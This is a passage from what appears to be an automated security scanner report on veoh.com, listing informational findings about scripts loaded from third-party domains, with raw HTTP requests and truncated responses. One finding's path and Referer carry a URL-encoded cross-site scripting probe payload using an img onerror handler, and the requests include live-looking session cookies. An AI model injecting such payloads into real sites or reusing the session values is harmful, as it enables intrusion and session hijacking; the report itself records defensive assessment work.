X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 76599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296767241"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.432. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:21:59 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 76599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768119"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.433. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/animation/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 132878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767083WdnCj7gW&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768576"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.434. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 140850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767641DYmkkC9T&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768561"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.435. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=30
Content-Length: 142204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767155HXCcYkcJ&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768574"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.436. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 134408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767324YkGXZzfQ&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768584"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.437. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 147258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767178Fn5bZQJP&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768564"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.438. http://www.veoh.com/browse/webseries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/webseries HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769489"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.439. http://www.veoh.com/browse/webseries/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/webseries/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:19 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769039"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.440. http://www.veoh.com/browse/webseries/featured/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/featured/1

Issue detail

